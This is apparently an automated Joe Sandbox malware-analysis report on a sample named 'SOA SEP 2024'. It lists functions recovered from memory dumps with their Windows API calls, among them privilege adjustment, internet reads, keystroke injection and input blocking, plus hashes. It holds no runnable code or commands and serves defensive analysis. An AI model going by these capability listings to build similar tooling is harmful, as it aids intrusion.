APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,0077E014,75920AE0,0077DEF1,007FDC38,?,?), ref: 0077E02C
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 0077E03E

Strings

kernel32.dll, xrefs: 0077E027
GetNativeSystemInfo, xrefs: 0077E038

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 2574300362-192647395
Opcode ID: 66d0c4ef0645d0f3f3690f05120ea67a460267b6dc3e2800a3c273e4c5b32db9
Instruction ID: 25ed7fe391959a78b0b5176092827f120ca8ec051514c2ed4e913d4d35bb92e4
Opcode Fuzzy Hash: 66d0c4ef0645d0f3f3690f05120ea67a460267b6dc3e2800a3c273e4c5b32db9
Instruction Fuzzy Hash: 6AD05E305007129ECB314B64E84865276E9EF0A310F29C459A499D2250D6BCC880C754

Function 007A13CA Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 560stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 007A13DC

Strings

(, xrefs: 007A1422
|, xrefs: 007A140C

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: lstrlen
String ID: ($|
API String ID: 1659193697-1631851259
Opcode ID: d39fef05587f6e46f5048b83a1d04866cdd100442b1633a1d8d7b815f144715c
Instruction ID: 71dd9ce89e1a621bcc266052e9235cc1d98c57c802788ee38553c2af707f88b8
Opcode Fuzzy Hash: d39fef05587f6e46f5048b83a1d04866cdd100442b1633a1d8d7b815f144715c
Instruction Fuzzy Hash: D3322575A006059FDB28CF69C480A6AB7F0FF88320F51C56EE59ADB3A1E774E941CB44

Function 0077B11F Relevance: 4.9, APIs: 3, Instructions: 377COMMON

Download Yara Rule

APIs

Part of subcall function 0077B34E: GetWindowLongW.USER32(?,000000EB), ref: 0077B35F

DefDlgProcW.USER32(?,?,?,?,?), ref: 0077B22F

Part of subcall function 0077B55D: DefDlgProcW.USER32(?,00000020,?,00000000), ref: 0077B5A5

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: Proc$LongWindow
String ID:
API String ID: 2749884682-0
Opcode ID: 4476965d458eb8d431046853182c7140b6e1f34c448644eceab169b67a0044b0
Instruction ID: f8d663cab5cf484061908a826ff16e533c6ee76a73b9df8085287f8b6c5d7e5b
Opcode Fuzzy Hash: 4476965d458eb8d431046853182c7140b6e1f34c448644eceab169b67a0044b0
Instruction Fuzzy Hash: CCA12570115109FADF397A295C8DFBF2A6DFB963C4B54C11EF40ADA292DB2C9C019272

Function 007B4EB5 Relevance: 4.7, APIs: 3, Instructions: 155networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,007B43BF,00000000), ref: 007B4FA6
InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 007B4FD2

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: Internet$AvailableDataFileQueryRead
String ID:
API String ID: 599397726-0
Opcode ID: c8594482fe6ae1f7e1b99f82ab2af72f59a428ea4f35b9c9d37ab08b2047e9db
Instruction ID: c5b8ad874c2cc2704404162428920335641141262eb644dbb1a070bd18d60aa3
Opcode Fuzzy Hash: c8594482fe6ae1f7e1b99f82ab2af72f59a428ea4f35b9c9d37ab08b2047e9db
Instruction Fuzzy Hash: BD41C371604609FFEB209E94DC85FFFB7BCEB40764F14402AF605A7182EA799E4197A0

Function 007AE1FD Relevance: 4.6, APIs: 3, Instructions: 72COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 007AE20D
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 007AE267
SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 007AE2B4

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: c0a0730033b46a4df30ef8ef0273b2d50fcf130adeded10104e50c3454927d47
Instruction ID: 973f197b6933ee2a2db47dd29aa3bb8ebbcb380eeb3993af94e82552c5bea9fb
Opcode Fuzzy Hash: c0a0730033b46a4df30ef8ef0273b2d50fcf130adeded10104e50c3454927d47
Instruction Fuzzy Hash: C1216D35A00118EFCB00EFA5D884EADBBF9FF89310F0584A9E945AB351DB359905CB54

Function 0079B134 Relevance: 4.6, APIs: 3, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 0077F4EA: std::exception::exception.LIBCMT ref: 0077F51E
Part of subcall function 0077F4EA: __CxxThrowException@8.LIBCMT ref: 0077F533

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0079B180
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0079B1AD
GetLastError.KERNEL32 ref: 0079B1BA

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
String ID:
API String ID: 1922334811-0
Opcode ID: 5f230a00dc04da90591fd68db931c7b9f99ab8143ab1fc0fc66cfa406259ebe5
Instruction ID: 2e23f1b397b1d7cd7d9f19dd77054d37c54578871bddf2ae0e90b638b6064932
Opcode Fuzzy Hash: 5f230a00dc04da90591fd68db931c7b9f99ab8143ab1fc0fc66cfa406259ebe5
Instruction Fuzzy Hash: 8C1191B2504205AFEB289F64EDC5D2BB7BDFB44750B20C52EF45A97241DB74FC418A60

Function 007A6606 Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 007A6623
DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 007A6664
CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 007A666F

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle
String ID:
API String ID: 33631002-0
Opcode ID: f6dd1589e80e9d79681b2fb7e9ec1f054f0428cee80d512a318989b04f588f61
Instruction ID: 832fa10221757fe2d025b7f144e858fe38ad52d379d362379f4c0bba85331d81
Opcode Fuzzy Hash: f6dd1589e80e9d79681b2fb7e9ec1f054f0428cee80d512a318989b04f588f61
Instruction Fuzzy Hash: 22116171E01228BFDB148FA4DC44BAEBBFCEB49B10F108152F900E7290D3B45E018BA5

Function 007A71FA Relevance: 4.5, APIs: 3, Instructions: 42memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 007A7223
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 007A723A
FreeSid.ADVAPI32(?), ref: 007A724A

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: 3c28da2c0ec8c857af8444542a8c4d102710879d3d7bbc54b9cf5adfa3fd281f
Instruction ID: 913f8358e84ba3f05430c4f04776763bf710a0f3e03bede86dc2e3b4e14e20d3
Opcode Fuzzy Hash: 3c28da2c0ec8c857af8444542a8c4d102710879d3d7bbc54b9cf5adfa3fd281f
Instruction Fuzzy Hash: 7DF06D76A01208BFDF04DFE4CC89AEEBBBCFF08201F008469A602E6181E2349A048B14

Function 007AF56F Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 007AF599
FindClose.KERNEL32(00000000), ref: 007AF5C9

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: fca1cd0774f8ee6162f821bb0ffd95621a4f050e3d6a75c06540626cadc911aa
Instruction ID: b4894a20910a84fc703a843930928c6b23b5dc4d4e36af730b0d8f519d714e17
Opcode Fuzzy Hash: fca1cd0774f8ee6162f821bb0ffd95621a4f050e3d6a75c06540626cadc911aa
Instruction Fuzzy Hash: B611A531600204DFDB10DF68D849A2EB3E8FF95324F01851DF969DB291CB34AD118B95

Function 007ACE7A Relevance: 3.0, APIs: 2, Instructions: 30windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,007BBE6A,?,?,00000000,?), ref: 007ACEA7
FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,007BBE6A,?,?,00000000,?), ref: 007ACEB9

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 5a74b0c518a430a7b28d4bb954880758a74898eeed0813545ab4fb4a20b44beb
Instruction ID: 100999b99e6669c23731cbe0380208a1a587933651961b654b7f49223524f4c7
Opcode Fuzzy Hash: 5a74b0c518a430a7b28d4bb954880758a74898eeed0813545ab4fb4a20b44beb
Instruction Fuzzy Hash: 16F08231105229FBDB21ABA4DC89FEA776DFF09351F008265F915D6181D6349A40CBA1

Function 007A411C Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON

Download Yara Rule

APIs

SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 007A4153
keybd_event.USER32(?,75A8C0D0,?,00000000), ref: 007A4166

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: InputSendkeybd_event
String ID:
API String ID: 3536248340-0
Opcode ID: ed45f90e508eb11e7751730839944234551bec6e3a02a5efaf93721a70bb67ad
Instruction ID: 723173ba13c9376460eee33b77c6f298f699f452eec76125db212a1299f88c20
Opcode Fuzzy Hash: ed45f90e508eb11e7751730839944234551bec6e3a02a5efaf93721a70bb67ad
Instruction Fuzzy Hash: 20F06D7080038DAFDB058FA4C845BBE7BB0EF04305F008409F9659A191D7B986129FA5

Function 0079AB84 Relevance: 3.0, APIs: 2, Instructions: 22COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,0079ACC0), ref: 0079AB99
CloseHandle.KERNEL32(?,?,0079ACC0), ref: 0079ABAB

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: 3177c5095a94d10d30408282afa4562c5977978bcb366feb920d70e3e4ba187a
Instruction ID: cfe5aec4e5cf18cd37093b8cdbd8947c6d20a68ab540a949043e5adccde25616
Opcode Fuzzy Hash: 3177c5095a94d10d30408282afa4562c5977978bcb366feb920d70e3e4ba187a
Instruction Fuzzy Hash: F5E0E671001510EFEB252F54FD09D7777EAEF04360B10C429F45985470D7665C90DB51

Function 007881AC Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,0000000E,00786DB3,-0000031A,?,?,00000001), ref: 007881B1
UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 007881BA

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: c7d41cde001ff6d18451745bb17e61d20e796ffee831c0cd4b957d19981d08ef
Instruction ID: b00be917e494e943fdee73efea104ca8d1a57d4f3cc8f78ca26a6dd4a92931fe
Opcode Fuzzy Hash: c7d41cde001ff6d18451745bb17e61d20e796ffee831c0cd4b957d19981d08ef
Instruction Fuzzy Hash: 2BB09232045648EBDB102BA1EC49B597F68EB0D652F008010F60D4C0A18B7758108A9A

Function 007677B0 Relevance: 2.6, APIs: 1, Instructions: 1076COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00767921

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 9346626a587363d2beabd7a8336d860a37405376b08b26f1a36433d99b3e97f9
Instruction ID: 969704df965a6d22baa0909ef058a8e47ff59a98872ec5dd92dca90c69295542
Opcode Fuzzy Hash: 9346626a587363d2beabd7a8336d860a37405376b08b26f1a36433d99b3e97f9
Instruction Fuzzy Hash: B6A26E70D05219CFDB28CF59C4806ADBBB1FF48354F2581AAD85AAB391D7389E81DF90

Function 00773B70 Relevance: 2.2, Strings: 1, Instructions: 903COMMON

Download Yara Rule

Strings

@, xrefs: 00774176

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: Exception@8Throwstd::exception::exception
String ID: @
API String ID: 3728558374-2766056989
Opcode ID: 657c6f2d41850018a60c97b82502e0273f0eb10de701fb1f004b5e84b5217079
Instruction ID: 1fc0cdb9fc6bbe9c3d47a97f976dacd202715cddf6c6c345fb52a78bfb9e8525
Opcode Fuzzy Hash: 657c6f2d41850018a60c97b82502e0273f0eb10de701fb1f004b5e84b5217079
Instruction Fuzzy Hash: 21729C71A04208EFCF24DF94C485AAEB7B5FF48380F14C05AE909AB391D779AE45DB91

Function 0078D1B9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d28272d74e630daf4799161e7dd7d8270d52a0ba96f368f8b12cac4399aff7ba
Instruction ID: 284584fb4ed6ab6ec517d081f8d65d6c82edb12ff7e23cb30a51da97409dc5a3
Opcode Fuzzy Hash: d28272d74e630daf4799161e7dd7d8270d52a0ba96f368f8b12cac4399aff7ba
Instruction Fuzzy Hash: F8321421D69F414DD723A634C822335A389EFB73D4F15D727E819B59AAEB2DD8838204

Function 007696C0 Relevance: 2.1, APIs: 1, Instructions: 573COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: __itow__swprintf
String ID:
API String ID: 674341424-0
Opcode ID: d0258798974150c03d57f8f1cdc8d2076ffa55a54860282e6c3fa714c3aec5e5
Instruction ID: 307c36a1a21c139623bc4cabf361b60cf52669ef80de3eb202c6bb19a51dea62
Opcode Fuzzy Hash: d0258798974150c03d57f8f1cdc8d2076ffa55a54860282e6c3fa714c3aec5e5
Instruction Fuzzy Hash: 0E229A71608301DFDB25DF14C894B6FB7E8AF84310F10891EFA9A97291DB79E945CB82

Function 0079038E Relevance: 1.8, APIs: 1, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c42c7c44994a880a1a88a1edd4a55089d21fe8a22748a5eedd6c879ca9b00f4
Instruction ID: 24dd9535051a7573dfa2349f22158d7d3507ddf59b0ce3fe7a8abca8ffa2f176
Opcode Fuzzy Hash: 3c42c7c44994a880a1a88a1edd4a55089d21fe8a22748a5eedd6c879ca9b00f4
Instruction Fuzzy Hash: 8BB1E320D2AF414DD6239639D831336BB5CAFBB2D5F92D71BFC2674D22EB2585838184

Function 007AB6CC Relevance: 1.6, APIs: 1, Instructions: 71COMMON

Download Yara Rule

APIs

__time64.LIBCMT ref: 007AB6DF

Part of subcall function 0078344A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,007ABDC3,00000000,?,?,?,?,007ABF70,00000000,?), ref: 00783453
Part of subcall function 0078344A: __aulldiv.LIBCMT ref: 00783473

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: Time$FileSystem__aulldiv__time64
String ID:
API String ID: 2893107130-0
Opcode ID: 5e650b494b40aff623a9c4205bf7a1ad2b8424fbff471c35a4d1f79b8cb48f29
Instruction ID: 52f191e5354a9bea66d5110cc48f3aead982bcde360c97c714646a29972048d6
Opcode Fuzzy Hash: 5e650b494b40aff623a9c4205bf7a1ad2b8424fbff471c35a4d1f79b8cb48f29
Instruction Fuzzy Hash: 4021A272634510CBC72ACF78D891A92B7E1EB95310B248E7DE0E5CB2C1CB78BA05CB54

Function 007B6AAF Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 007B6ACA

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
